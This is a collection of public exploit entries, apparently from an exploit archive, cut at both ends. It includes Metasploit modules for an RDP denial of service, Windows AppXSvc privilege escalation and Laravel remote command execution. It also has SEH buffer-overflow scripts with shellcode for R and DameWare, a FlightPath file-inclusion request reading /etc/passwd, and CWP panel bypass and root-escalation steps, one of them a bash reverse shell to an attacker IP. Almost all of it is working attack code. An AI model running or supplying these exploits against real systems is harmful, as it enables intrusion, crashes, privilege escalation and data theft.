rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef")) ## x64_payload: rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef")) end end def produce_dos() unless(rdp_connection_initiation()) vprint_status("Could not connect to RDP.") return(false) end vprint_status("Sending initial client data") received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME'])) rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received) vprint_status("Sending erect domain request") rdp_send(pdu_erect_domain_request()) vprint_status("Sending attach user request") received = rdp_sendrecv(pdu_attach_user_request()) user1 = received[9, 2].unpack("n").first [1003, 1004, 1005, 1006, 1007].each do | chan | rdp_sendrecv(pdu_channel_request(user1, chan)) end ## 5.3.4 Client Random Value client_rand = '' 32.times { client_rand << rand(0..255) } rcran = bytes_to_bignum(client_rand) vprint_status("Sending security exchange PDU") rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen)) ## We aren't decrypting anything at this point. Leave the variables here ## to make it easier to understand in the future. rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand) vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}") vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}") vprint_status("HMAC_KEY: #{bin_to_hex(hmackey)}") vprint_status("SESS_BLOB: #{bin_to_hex(sessblob)}") rc4enckey = RC4.new(rc4encstart) vprint_status("Sending client info PDU") # TODO pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP']) received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true)) vprint_status("Received License packet") rdp_recv() vprint_status("Sending client confirm active PDU") rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey)) vprint_status("Sending client synchronize PDU") rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey)) vprint_status("Sending client control cooperate PDU") rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey)) vprint_status("Sending client control request control PDU") rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey)) vprint_status("Sending client input sychronize PDU") rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey)) vprint_status("Sending client font list PDU") rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey)) vprint_status("Sending close mst120 PDU") crash_test(rc4enckey, hmackey) vprint_status("Sending client disconnection PDU") rdp_send(rdp_build_data_tpdu("\x21\x80")) return(true) end # ------------------------------------------------------------------------- # def run_host(ip) ## Allow the run command to call the check command. begin if(open_connection()) status = produce_dos() end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e bt = e.backtrace.join("\n") vprint_error("Unexpected error: #{e.message}") vprint_line(bt) elog("#{e.message}\n#{bt}") rescue RdpCommunicationError => e vprint_error("Error communicating RDP protocol.") status = Exploit::CheckCode::Unknown rescue Errno::ECONNRESET => e # NLA? vprint_error("Connection reset, possible NLA is enabled.") rescue => e bt = e.backtrace.join("\n") vprint_error("Unexpected error: #{e.message}") vprint_line(bt) elog("#{e.message}\n#{bt}") ensure if(status == true) sleep(1) unless(open_connection()) print_good("The host is crashed!") else print_bad("The DoS has been sent but the host is already connected!") end end disconnect() end end end

# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion # Date: 07-07-2019 # Exploit Author: Mohammed Althibyani # Vendor Homepage: http://getflightpath.com # Software Link: http://getflightpath.com/project/9/releases # Version: < 4.8.2 & < 5.0-rc2 # Tested on: Kali Linux # CVE : CVE-2019-13396 # Parameters : include_form # POST Method: use the login form to get right form_token [ you can use wrong user/pass ] This is how to POST looks like: POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login # modfiy the POST request to be: POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd # Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.

#!/usr/bin/python # Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass) # Date: 2019-07-15 # Exploit Author: blackleitus # Vendor Homepage: https://www.r-project.org/ # Tested on: Windows 10 Home Single Language 64-bit # Social: https://twitter.com/blackleitus # Website: https://skybulk.github.io/ # discovered by: bzyo # GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK import struct outfile = 'payload.txt' def create_rop_chain(): rop_gadgets = [ 0x6c998f58, # POP EAX # RETN [R.dll] 0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll] 0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll] 0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll] 0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ} 0x64c46010, # &Writable location [methods.dll] 0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0xffffffc0, # Value to negate, will become 0x00000040 0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ} 0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ} 0xfffffdff, # Value to negate, will become 0x00000201 0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ} 0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ} 0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x41414141, # Filler (compensate) 0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x6ca2a9bd, # & jmp esp [R.dll] 0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} 0x90909090, # nop 0x6ca00e93, # POP EDI # RETN [R.dll] 0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll] 0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() junk = "A" * 1016 seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} : # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ} # msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python nops = struct.pack("<L", 0x6cacc7e3) * 30 shellcode = "" shellcode += "\x90" * 20 shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode)) payload = junk + seh + nops + rop_chain + shellcode + padding with open(outfile, 'w') as file: file.write(payload) print "payload File Created\n"

# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login # Date: 6 July 2019 # Exploit Author: Pongtorn Angsuchotmetee # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: Not available, user panel only available for latest version # Version: 0.9.8.836 to 0.9.8.846 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13360, CVE-2019-13605 # ==================================================================== # Information # ==================================================================== Product : CWP Control Web Panel Vulnerability Name : User panel bypass Login version : 0.9.8.836 Fixed on : 0.9.8.848 Test on : CentOS 7.6.1810 (Core) Reference : http://centos-webpanel.com/ : https://control-webpanel.com/changelog CVE-Number : CVE-2019-13605 # ==================================================================== # Root course of the vulnerability # ==================================================================== After login success, the application will retuens base64 value and use it to authenticate again, That allow attacker to modify the response and become a user # ==================================================================== # Response format (version 0.9.8.836 to 0.9.8.837) # ==================================================================== <username>||/<username>/theme/original # CVE-2019-13360 # ==================================================================== # Steps to Reproduce Version 0.9.8.836 to 0.9.8.837 # ==================================================================== 1. Login with valid username and invalid password 2. Replace the target username in "<username>||/<username>/theme/original" 3. Convert to base64 4. Place the base64 value to HTTP response body 5. Gain access to user area # CVE-2019-13605 # ==================================================================== # Steps to Reproduce Version 0.9.8.838 to 0.9.8.846 # ==================================================================== 1. Create a testing environment 1.1 Create user as a target username 1.2 Login as the user 1.3 Save the HTTP response body (token value) 2. Login to the real target with valid username and invalid password 3. Place the value we saved from step 1.3 in HTTP response body 4. Gain access to user area *The response value format is depends on version, just replace the hole value # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md # ==================================================================== # Timeline # ==================================================================== 2019-07-07: Discovered the bug 2019-07-07: Reported to vendor 2019-07-07: Vender accepted the vulnerability 2019-07-11: The vulnerability has been fixed 2019-07-15: Advisory published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee

//====================================================================\\ || || || CWP Control Web Panel 0.9.8.836 - 0.9.8.839 || || Root Privilege Escalation || || || \\====================================================================// # ==================================================================== # Information # ==================================================================== # Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation # Date: 6 July 2019 # Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change version in the script) # Version: 0.9.8.836 to 0.9.8.839 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13359 Product : CWP Control Web Panel Vulnerability Name : Root Privilege Escalation version : 0.9.8.836 Fixed on : 0.9.8.840 Test on : Tested on: CentOS 7.6.1810 (Core) Reference : http://centos-webpanel.com/ : https://control-webpanel.com/changelog CVE-Number : CVE-2019-13359 # ==================================================================== # Root course of the vulnerability # ==================================================================== 1. The session file are store at /tmp directory 2. rkey value in the session file dose not change when access by the same source IP address # ==================================================================== # Steps to Reproduce # ==================================================================== Session prepareation state 1. Check the current IP address of attacker 2. Set the IP address on testing environment network 3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx) 4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456" # we need "rkey" 5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx) * rkey is created from client ip, then do not change client ip when attack the real target Attack state # # Method 1 Uploading via reverse shell # 1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1" 2. Create session file through reverse shell echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456 3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php 4. Change file permission "chmod 664 /tmp/sess_123456" 5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456) 6. Open the URL and become the root user # # Method 2 Uploading via File manager function # 1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature 2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php 3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456) 4. Open the URL and become the root user *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md # ==================================================================== # Timeline # ==================================================================== 2019-06-30: Discovered the bug 2019-06-30: Reported to vendor 2019-06-30: Vender accepted the vulnerability 2019-07-02: The vulnerability has been fixed 2019-07-06: Published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak

#!/usr/bin/env python # Author: Xavi Beltran # Date: 11/07/2019 # Description: # SEH based Buffer Overflow # DameWare Remote Support V. 12.0.0.509 # CVE-2018-12897 # Contact: [email protected] # Webpage: https://xavibel.com # Tested on: Windows XP SP3 ESP # Credit for Adam Jeffreys from Nettitude! :) # Usage: # Right click on a host >> AMT >> AMT Settings dialog # Mark "Use SOCKS proxy" box # Paste the string in the Host field junk = "\x41" * 1672 # Unicode compatible padding nseh = "\x61\x43" # 007A007B - POP POP RET seh = "\x7B\x7A" align = "" align += "\x05\x20\x11" # add eax,0x11002000 align += "\x71" # Venetian Padding align += "\x2d\x19\x11" # sub eax,0x11001900 align += "\x71" # Venetian Padding align += "\x50" # push eax align += "\x71" # Venetian Padding align += "\xC3" # RETN padding = "\x41" * 11 junk2 = "\x41" * 870 junk3 = "\x41" * 2014 # msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw # ./alpha2 eax --unicode --uppercase < shellcode.raw # 508 bytes shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA" crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3 print(crash)

# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message # Date: 15 July 2019 # Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: Not available, user panel only available for lastest version # Version: 0.9.8.836 to 0.9.8.847 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13383 # ==================================================================== # Information # ==================================================================== Product : CWP Control Web Panel version : 0.9.8.838 Fixed on : 0.9.8.848 Test on : CentOS 7.6.1810 (Core) Reference : https://control-webpanel.com/ CVE-Number : 2019-13383 # ==================================================================== # Root course of the vulnerability # ==================================================================== The server response different message between login with valid and invalid user. This allows attackers to check whether a username is valid by reading the HTTP response. # ==================================================================== # Steps to Reproduce # ==================================================================== 1. Login with a random user by using invalid password POST /login/index.php?acc=validate HTTP/1.1 Host: 192.168.80.137:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: d41d8cd98f00b204e9800998ecf8427e X-Requested-With: XMLHttpRequest Content-Length: 30 Connection: close Referer: https://192.168.80.137:2083/login/?acc=logon username=AAA&password=c2Rmc2Rm 2. Check the HTTP response body 2.1 User does not exist (server response suspended) HTTP/1.1 200 OK Server: cwpsrv Date: Mon, 15 Jul 2019 01:39:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.0.32 Content-Length: 9 suspended 2.2 User does exist (server response nothing) HTTP/1.1 200 OK Server: cwpsrv Date: Mon, 15 Jul 2019 01:40:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.0.32 Content-Length: 0 3. HTTP response body format depends on software version, but all of them keep responding differently as the example below ------------------------------------------------------------ | Username | Password | Result | ------------------------------------------------------------ | valid | valid | login success | | valid | invalid | {"error":"failed"} | | invalid | invalid | {"error":"user_invalid"} | ------------------------------------------------------------ # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md # ==================================================================== # Timeline # ==================================================================== 2019-07-06: Discovered the bug 2019-07-06: Reported to vendor 2019-07-06: Vender accepted the vulnerability 2019-07-11: The vulnerability has been fixed 2019-07-15: Published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::FileInfo include Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'AppXSvc Hard Link Privilege Escalation', 'Description' => %q( There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763. Due to the AppXSvc's improper handling of hard links, a user can gain full privileges over a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM. This module employs a technique using the Diagnostics Hub Standard Collector Service (DiagHub) which was discovered by James Forshaw to load and execute a DLL as SYSTEM. ), 'License' => MSF_LICENSE, 'Author' => [ 'Nabeel Ahmed', # Vulnerability discovery and PoC 'James Forshaw', # Code creating hard links and communicating with DiagHub service 'Shelby Pace' # Metasploit module ], 'References' => [ [ 'CVE', '2019-0841' ], [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ], [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ], [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ], [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ] ], 'Targets' => [ [ 'Windows 10', { 'Platform' => 'win' } ] ], 'DisclosureDate' => '2019-04-09', 'DefaultTarget' => 0 )) end def check return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i path = expand_path('%WINDIR%\\system32\\win32k.sys') major, minor, build, revision, brand = file_version(path) return CheckCode::Appears if build < 17763 CheckCode::Detected end def upload_file(file_name, file_path) contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name)) write_file(file_path, contents) register_file_for_cleanup(file_path) rescue fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target') end def init_process print_status("Attempting to launch Microsoft Edge minimized.") cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30) end def mk_hard_link(src, target, link_exe) out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"") return (out && out.include?('Done')) end def write_payload print_status('Writing the payload to disk') code = generate_payload_dll @original_data = read_file(@rtf_path) write_file(@rtf_path, code) end def exploit vuln_status = check fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system? cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"") dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat") fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path) if session.arch == ARCH_X86 exe_name = 'CVE-2019-0841_x86.exe' f_name = 'diaghub_load_x86.exe' elsif session.arch == ARCH_X64 exe_name = 'CVE-2019-0841_x64.exe' f_name = 'diaghub_load_x64.exe' end link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe") upload_file(exe_name, link_file_name) @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf') fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name) print_good('Successfully created hard link') init_process cmd_exec("taskkill /F /IM MicrosoftEdge.exe") write_payload diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}") upload_file(f_name, diaghub_path) cmd = "\"#{diaghub_path}\" \"license.rtf\"" cmd_exec(cmd) end def cleanup folder_path = expand_path("%TEMP%\\etw") dir_rm(folder_path) write_file(@rtf_path, @original_data) super end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29. Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation. }, 'DisclosureDate' => '2018-08-07', 'Author' => [ 'Ståle Pettersen', # Discovery 'aushack', # msf exploit + other leak ], 'References' => [ ['CVE', '2018-15133'], ['CVE', '2017-16894'], ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'], ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'], ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0'] ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultTarget' => 0, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }, 'Payload' => { 'DisableNops' => true }, 'Targets' => [[ 'Automatic', {} ]], )) register_options([ OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']), OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', '']) ]) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET' }) # Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more? unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i return CheckCode::Unknown end auth_token = check_appkey if auth_token.blank? || test_appkey(auth_token) == false vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.' return CheckCode::Detected end random_string = Rex::Text.rand_text_alphanumeric(12) 1.upto(4) do |method| vuln = generate_token("echo #{random_string}", auth_token, method) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'headers' => { 'X-XSRF-TOKEN' => "#{vuln}", } }) if res.body.include?(random_string) return CheckCode::Vulnerable # Not conclusive but witnessed in the wild elsif res.body.include?('Method Not Allowed') return CheckCode::Safe end end CheckCode::Detected rescue Rex::ConnectionError CheckCode::Unknown end def env_leak key = '' vprint_status 'Checking for CVE-2017-16894 .env information leak' res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '.env'), 'method' => 'GET' }) # Good but may be other software. Can also check for 'APP_NAME=Laravel' etc return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/ key = $1 if key vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}" return key end vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY' key end def framework_leak(decrypt_ex = true) key = '' if decrypt_ex # Possible config error / 0day found by aushack during pentest # Seen in the wild with recent releases res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'headers' => { 'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger } }) return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY') else res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST' }) return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY') end # Good sign but might be more universal with e.g. 'vendor/laravel/framework' ? # Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64 if res.body =~ /\>base64:(.*)\<\/span\>/ key = $1 vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}" end key end def check_appkey key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : '' return key unless key.empty? vprint_status 'APP_KEY not set. Will try to find it...' key = env_leak key = framework_leak if key.empty? key = framework_leak(false) if key.empty? key.empty? ? false : key end def test_appkey(value) value = Rex::Text.decode_base64(value) return true if value && value.length.to_i == 32 false end def generate_token(cmd, key, method) # Ported phpggc Laravel RCE php objects :) case method when 1 payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}' when 2 payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}' when 3 payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}' when 4 payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}' end cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested cipher.encrypt cipher.key = Rex::Text.decode_base64(key) iv = cipher.random_iv value = cipher.update(payload_decoded) + cipher.final pload = Rex::Text.encode_base64(value) iv = Rex::Text.encode_base64(iv) mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload) iv = iv.gsub('/', '\\/') # Escape slash pload = pload.gsub('/', '\\/') # Escape slash json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"}) json_out = Rex::Text.encode_base64(json_value) json_out end def exploit auth_token = check_appkey if auth_token.blank? || test_appkey(auth_token) == false vprint_error 'Unable to continue: the set datastore 